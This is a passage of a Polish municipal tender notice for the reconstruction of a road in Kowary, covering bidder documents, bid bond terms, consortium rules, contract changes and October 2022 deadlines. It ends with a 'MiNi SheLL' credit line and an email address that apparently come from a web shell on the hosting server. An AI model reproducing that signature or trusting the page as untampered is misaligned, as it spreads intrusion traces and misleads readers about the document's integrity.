konsumentów ( Dz. U. z 2021.275 ), z innym wykonawcą, który <br/>złożył ofertę w postępowaniu albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub <br/>informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej (wzór oświadczenia stanowi załącznik nr 6 do SWZ) <br/>b) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w <br/>zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem jeżeli odrębne przepisy <br/>wymagają wpisu do rejestru lub ewidencji.<br/>3. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentu, o którym mowa w pkt. 1 lit. b), składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce <br/>zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono jego upadłości wystawione nie wcześniej niż 3 <br/>miesiące przed upływem terminu składania ofert. <br/>Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument <br/>dotyczy, nie wydaje się dokumentów, o których mowa w z § 4 ust. 1 Rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać <br/>zamawiający od Wykonawcy (Dz. U. z 2020 r., poz. 2415), zastępuje się je odpowiednio w całości lub w części dokumentem <br/>zawierającym odpowiednio: oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub <br/>oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli <br/>w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów <br/>o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu <br/>zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz podmiotowych środków dowodowych, które wykonawca składa w postępowaniu na wezwanie zamawiającego w celu <br/>potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu należy złożyć w zakresie: <br/>1) zdolności do występowania w obrocie gospodarczym: <br/>z uwagi na brak postawionego warunku Zamawiający odstępuje od żądania dowodów w przedmiotowym zakresie. <br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: <br/>z uwagi na brak postawionego warunku Zamawiający odstępuje od żądania dowodów w przedmiotowym zakresie. <br/>3) sytuacji ekonomicznej lub finansowej: <br/>3.1) dokumentów potwierdzających, że wykonawca jest ubezpieczony od <br/>Odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy <br/>gwarancyjnej tego ubezpieczenia. <br/>4) zdolności technicznej lub zawodowej: <br/>4.1) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest <br/>krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie – zgodnie z <br/>treścią załącznika nr 7 do SWZ. <br/>„Dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane <br/>były wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne <br/>odpowiednie dokumenty”. <br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych wspólnie z innymi wykonawcami, wykaz dotyczy robót budowlanych w których wykonaniu Wykonawca ten bezpośrednio uczestniczył. <br/>4.2) wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za <br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych <br/>przez nie czynności oraz informację o podstawie dysponowania tymi osobami – w zakresie informacji określonych w Załączniku nr 8 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Przed podpisaniem umowy należy przekazać Zamawiającemu: <br/>a) dowód wniesienia zabezpieczenia należytego wykonania umowy, o którym mowa w rozdz. XXII SWZ, <br/>b) potwierdzenie, w stosunku do osób skierowanych do realizacji zamówienia, wskazanych w załączniku nr 8 - kopii <br/>dokumentów potwierdzających stosowne uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie wraz z dokumentami potwierdzającymi wpis do właściwej Izby Inżynierów Budownictwa. Aktualność wpisu musi zachować <br/>ważność przez cały okres realizacji umowy, <br/>c) umowę konsorcjum w przypadku składania oferty przez podmioty występujące wspólnie, <br/>d) umowę spółki cywilnej w przypadku składania oferty przez podmioty realizującej zadanie w tej formie organizacyjnej. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Informacje ogólne: Wykonawca zobowiązany jest wnieść wadium przed terminem składania ofert w wysokości 2.000,00 PLN (słownie złotych: dwa tysiące 00/100). <br/>2. Wadium może być wniesione w jednej lub kilku z następujących form: <br/>- pieniądzu;- gwarancjach bankowych;- gwarancjach ubezpieczeniowych; <br/>- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. <br/>3. Miejsce wniesienia wadium: Wadium wnoszone w pieniądzu (PLN) należy wpłacić przelewem na następujący rachunek Zamawiającego: <br/>PKO BP S.A. konto depozytowe 08 1020 2124 0000 8002 0011 1641 z adnotacją: „Odsklepienie powierzchni nieprzepuszczalnych - Przebudowa ciągu komunikacyjnego ul. Jana Matejki&#34; - III etap” <br/>4. Wadium wniesione w pieniądzu za pomocą przelewu uważa się za skutecznie wniesione w momencie wpływu wymaganej kwoty na rachunek bankowy Zamawiającego (wówczas, gdy bank prowadzący rachunek wskazany przez Zamawiającego dokona przeksięgowania kwoty na rachunek Zamawiającego przed upływem terminu składania ofert). <br/>5. W przypadku wnoszenia wadium w pieniądzu Zamawiający zaleca dołączenie do oferty kopii polecania przelewu wystawionego przez Wykonawcę. <br/>6. Gwarancje i poręczenia należy wystawić w formie elektronicznej opatrzonej przez wystawcę kwalifikowanym podpisem elektronicznym na: Gmina Miejska Kowary i przekazać Zamawiającemu oryginał w formie elektronicznej. <br/>7. W przypadku składania wadium w formie gwarancji lub poręczenia, gwarancja lub poręczenie muszą być bezwarunkowe, nieodwołalne i płatne na pierwsze pisemne żądanie Zamawiającego, muszą być wykonalne na terytorium Rzeczpospolitej Polski, sporządzone zgodnie z obowiązującym prawem i winny zawierać minimum następujące elementy: <br/>1) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego), <br/>2) gwaranta/poręczyciela (banku lub instytucji ubezpieczeniowej udzielających <br/>3) gwarancję/poręczyciela) oraz wskazanie ich siedzib. <br/>4) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem; <br/>5) kwotę wadium; <br/>6) termin ważności gwarancji/poręczenia (nie krótszy niż termin związania ofertą); <br/>7) zobowiązanie gwaranta/poręczyciela do „zapłacenia kwoty gwarancji bezwarunkowo na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano: <br/>a) w odpowiedzi na wezwanie, o którym mowa w art. 107 ust. 2 lub art. 128 ust. 1, z przyczyn leżących po jego stronie, nie <br/>złożył podmiotowych środków dowodowych lub przedmiotowych <br/>b) środków dowodowych potwierdzających okoliczności o których mowa w art. 57 lub art. 106 ust. 1, oświadczenia, o którym mowa w art. 125 ust. 1, innych dokumentów lub oświadczeń lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 223 ust. 2 pkt. 3, co spowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej; <br/>c) Wykonawca, którego oferta została wybrana: <br/>i. Odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, <br/>ii. Nie wniósł wymaganego zabezpieczenia należytego wykonania umowy <br/>d) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy, którego oferta została wybrana <br/>8. W przypadku wnoszenia wadium przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia z treści gwarancji / poręczenia powinno wynikać, że odnosi się ona / ono zarówno do zleceniodawcy gwarancji / poręczenia, jak również do wszystkich pozostałych wykonawców wspólnie ubiegających się o udzielenie zamówienia (zaleca się, aby wszyscy członkowie wchodzący w skład podmiotu wspólnego byli wymienieni). <br/>9. Oferta Wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp zostanie odrzucona. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o zamówienie. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia na podstawie art. 58 ust. 1 ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo <br/>do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być <br/>załączone do oferty. <br/>2.Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem. <br/>3.Wykonawcy wspólnie ubiegający się o zamówienie na podstawie art. 117 ust. 4 ustawy Pzp składają wraz z ofertą <br/>oświadczenie, z którego wynika, jaki zakres przedmiotu zamówienia wykonają poszczególni Wykonawcy według wzoru <br/>stanowiącego załącznik nr 4 do SWZ. <br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców <br/>wspólnie ubiegający się o zamówienie. Żaden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z postępowania. <br/>5. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, których oferta zostanie wybrana jako najkorzystniejsza, <br/>przed podpisaniem umowy w sprawie zamówienia są zobowiązani do zawarcia między sobą umowy regulującej ich <br/>współpracę i dostarczenia jej Zamawiającemu na 3 dni przed podpisaniem umowy o udzielenie zamówienia, nie później <br/>jednak niż w dniu podpisania umowy o udzielenie zamówienia. Umowa ta w swojej treści musi zawierać co najmniej <br/>następujące <br/>postanowienia: <br/>a) musi być zawarta na czas nie krótszy niż okres realizacji zamówienia oraz okres gwarancji; <br/>b) musi zawierać określenie celu gospodarczego, dla którego została zawarta – celem tym musi <br/>być zrealizowanie przedmiotu zamówienia; <br/>c) określenie roli każdego z Wykonawców wspólnie realizujących zamówienie, jedna ze stron <br/>(partnerów) umowy musi być wyznaczona jako lider; <br/>d) wyznaczenie spośród siebie Pełnomocnika upoważnionego do zaciągania zobowiązań w <br/>imieniu wszystkich Wykonawców realizujących wspólnie umowę; <br/>e) musi zawierać następujące przepisy w brzmieniu: <br/>i. wszyscy partnerzy ponoszą solidarną odpowiedzialność za wykonanie, niewykonanie lub nienależyte wykonanie umowy; ii. lider jest uprawniony do otrzymywania płatności. <br/>f) numery i nazwy rachunków bankowych, na które dokonywane będą płatności z tytułu realizacji przedmiotowej umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Działając na podstawie art. 455 ust. 1 pkt 1) ustawy Pzp, Zamawiający przewiduje możliwość zmiany istotnych <br/>postanowień zawartej umowy w następujących przypadkach: <br/>1) zmiany terminów realizacji umowy spowodowana okolicznościami leżącymi po stronie Zamawiającego lub Wykonawcy <br/>lub okolicznościami niezależnymi od Stron, w tym w wyniku wystąpienia co najmniej jednej z okoliczności wymienionych <br/>poniżej, z uwzględnieniem warunków ich wprowadzenia: <br/>a) opóźnienia Zamawiającego w przekazaniu terenu budowy; <br/>b) okoliczności zaistniałych w trakcie realizacji przedmiotu umowy i uniemożliwiających terminowe wykonanie przedmiotu <br/>umowy, w szczególności : <br/>i. wystąpienia nietypowych dla danego miesiąca warunków atmosferycznych, które będą określane na podstawie średnich <br/>wartości dla danego miesiąca z ostatnich 5 lat dla rejonu realizowanych robót. Odchylenie od ww. średniej o ponad: 50% w przypadku opadów atmosferycznych lub o 5 stopni Celsjusza w przypadku temperatur, będzie uznane za niekorzystne <br/>warunki atmosferyczne; <br/>ii. kolizji z sieciami infrastruktury: wod-kan, gazowej, ciepłowniczej, telefonicznej, telekomunikacyjnej, energetycznej, <br/>elektroenergetycznej oraz z zielenią miejską i innymi obiektami zagospodarowania terenu; <br/>iii. istotnego wpływu przedsięwzięć realizowanych przez gestorów mediów dotyczących terenu objętego przedmiotowym <br/>zamówieniem; <br/>c) siły wyższej mającej bezpośredni, udokumentowany wpływ na realizację przedmiotowego zamówienia. Wykonawca <br/>zobowiązany jest wykazać i uzasadnić w formie pisemnej, w sposób jednoznaczny i nie budzący wątpliwości, że siła wyższa miała wpływ na wykonywanie przez niego przedmiotu umowy; <br/>d) wystąpienie robót dodatkowych oraz robót zamiennych i/lub zmiany technologii, przy czym zmiana terminów musi być <br/>udokumentowana, a pisemny wniosek o jej dokonanie Strona występująca z wnioskiem zobowiązana jest złożyć <br/>niezwłocznie po powzięciu wiadomości o takiej okoliczności, <br/>e) w przypadku przedłużających się terminów dostaw materiałów lub urządzeń, przy czym za ponad standardowy uznany <br/>będzie udokumentowany czas oczekiwania dłuższy 8 tygodni w odniesieniu do materiałów, w takich przypadkach umowa <br/>może zostać przedłużona o czas trwania przeszkody <br/>2) zmiany wynagrodzenia, w wyniku: <br/>a) zmian odnoszących się do treści OPZ lub dokumentacji projektowej, które to zmiany są niezbędne do prawidłowego wykonania przedmiotu umowy i osiągnięcia przyjętego założenia; zmiany wynagrodzenia zostaną ustalone na podstawie <br/>kosztorysów przygotowanych przez Wykonawcę i zatwierdzonych przez Zamawiającego, opracowanych w oparciu o <br/>założenia opisane w par. 12 projektu Umowy. <br/>b) robót dodatkowych lub robót zamiennych; roboty te będą rozliczane na podstawie kosztorysów sporządzonych metodą <br/>kalkulacji szczegółowej przygotowanych przez Wykonawcę i zatwierdzonych przez Zamawiającego. Kosztorysy te będą <br/>opracowane w oparciu o założenia opisane w par. 12 projektu Umowy. <br/>3) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia - odpowiednie zapisy umowy zostaną dostosowane do obowiązującego stanu prawnego. <br/>4) zmiany warunków/sposobu płatności wynikających z potrzeb zamawiającego lub wykonawcy i nie naruszające interesu <br/>zamawiającego, w tym sposobu rozliczania umowy i płatności na rzecz Wykonawcy; <br/>5) oczywistych omyłek rachunkowych i pisarskich. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-10-14 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia lub wycofania oferty dostępnego na ePUAP i udostępnionego również na miniPortalu. Sposób złożenia oferty opisany został w Instrukcji użytkownika dostępnej na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-10-14 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com